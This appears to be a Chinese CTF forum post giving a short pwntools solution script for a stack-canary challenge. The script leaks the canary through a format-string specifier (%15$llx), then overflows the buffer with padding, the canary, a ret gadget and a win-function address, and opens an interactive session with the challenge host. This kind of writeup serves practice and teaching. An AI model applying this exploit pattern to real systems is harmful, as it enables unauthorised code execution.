返回
2
0

qwq

Eddy夏祐,2026-03-11 14:09


很简单的canary,记得用sendlineafter和接收之前把空行接收了就行


from pwn import *
from LibcSearcher import LibcSearcher
p = remote('nc1.ctfplus.cn',45876)
context.arch = 'amd64'
log.level = 'debug'

win=0x00000000004011DB
ret=0x000000000040101a

payload1=b'%15$llx'
p.sendlineafter(b'name:',payload1)
p.recvline()
canary_hex= p.recv(16)
canary=int(canary_hex,16)
log.info("Canary:"+hex(canary))

payload=b'a'*72
payload+=p64(canary)
payload+=p64(ret)
payload+=p64(win)
p.sendline(payload)

p.interactive()

暂无回复。你的想法是什么?


bottom-logo1
bottom-logo2captionbottom-logo3
GeeSec
商务合作
bottom-logo4
蜀ICP备2024047787号-2